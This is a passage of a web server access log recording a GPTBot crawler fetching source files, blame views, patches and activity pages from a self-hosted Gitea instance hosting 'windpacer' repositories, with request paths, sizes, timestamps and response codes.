git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14292] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" -[17/Feb/2026:13:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9875] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15897] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16906] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" -[17/Feb/2026:13:20:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" -[17/Feb/2026:13:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 14955] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" -[17/Feb/2026:13:20:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" -[17/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 13777] [Gzip 6.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" -[17/Feb/2026:13:20:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/ChatBot.tsx" -[17/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" -[17/Feb/2026:13:20:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" -[17/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" -[17/Feb/2026:13:20:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" [Client 74.7.227.38] [Length 580] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/vite.config.ts" -[17/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.patch" [Client 74.7.227.38] [Length 550733] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:20:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f.patch" [Client 74.7.227.38] [Length 141606] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f" -[17/Feb/2026:13:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83.patch" [Client 74.7.227.38] [Length 1368171] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83" -[17/Feb/2026:13:20:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10728] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/.gitignore" -[17/Feb/2026:13:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/explore/users" [Client 74.7.227.38] [Length 5447] [Gzip 2.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/explore/repos" -[17/Feb/2026:13:20:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/TestProject" -[17/Feb/2026:13:20:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/TestProject" -[17/Feb/2026:13:20:55 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Header.tsx" -[17/Feb/2026:13:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" [Client 74.7.227.38] [Length 9910] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/TestProject" -[17/Feb/2026:13:20:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" -[17/Feb/2026:13:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 23201] [Gzip 4.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2" -[17/Feb/2026:13:20:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13866] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/daily" [Client 74.7.227.38] [Length 8366] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:20:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/.gitignore" -[17/Feb/2026:13:20:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 10138] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" -[17/Feb/2026:13:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" [Client 74.7.227.38] [Length 10138] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/.gitignore" -[17/Feb/2026:13:21:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" [Client 74.7.227.38] [Length 10138] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/.gitignore" -[17/Feb/2026:13:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" [Client 74.7.227.38] [Length 10142] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/.gitignore" -[17/Feb/2026:13:21:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver.atom" [Client 74.7.227.38] [Length 2476] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/forks" -[17/Feb/2026:13:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.atom" [Client 74.7.227.38] [Length 10256] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/stars" -[17/Feb/2026:13:21:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" [Client 74.7.227.38] [Length 11643] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" [Client 74.7.227.38] [Length 11653] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426" -[17/Feb/2026:13:21:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" -[17/Feb/2026:13:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" -[17/Feb/2026:13:21:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" [Client 74.7.227.38] [Length 11642] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:13:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10810] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/types.ts" -[17/Feb/2026:13:21:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 11493] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html" -[17/Feb/2026:13:21:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/quarterly" [Client 74.7.227.38] [Length 8593] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" -[17/Feb/2026:13:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/activity/contributors" [Client 74.7.227.38] [Length 7603] [Gzip 2.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/activity" -[17/Feb/2026:13:21:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/npm/data/logs" -[17/Feb/2026:13:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 10968] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/npm/data/logs" -[17/Feb/2026:13:21:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 10891] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:21:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 10889] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/main.py" [Client 74.7.227.38] [Length 19731] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:21:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/main.py" [Client 74.7.227.38] [Length 19733] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/README.md" [Client 74.7.227.38] [Length 10892] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:21:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/main.py" [Client 74.7.227.38] [Length 19734] [Gzip 5.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17351] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:21:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17350] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/Gitea_Manual.md" [Client 74.7.227.38] [Length 17351] [Gzip 2.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:21:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/my_database.db" [Client 74.7.227.38] [Length 10861] [Gzip 2.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:21:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/README.md" -[17/Feb/2026:13:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 9907] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" -[17/Feb/2026:13:21:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/README.md" [Client 74.7.227.38] [Length 9940] [Gzip 2.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 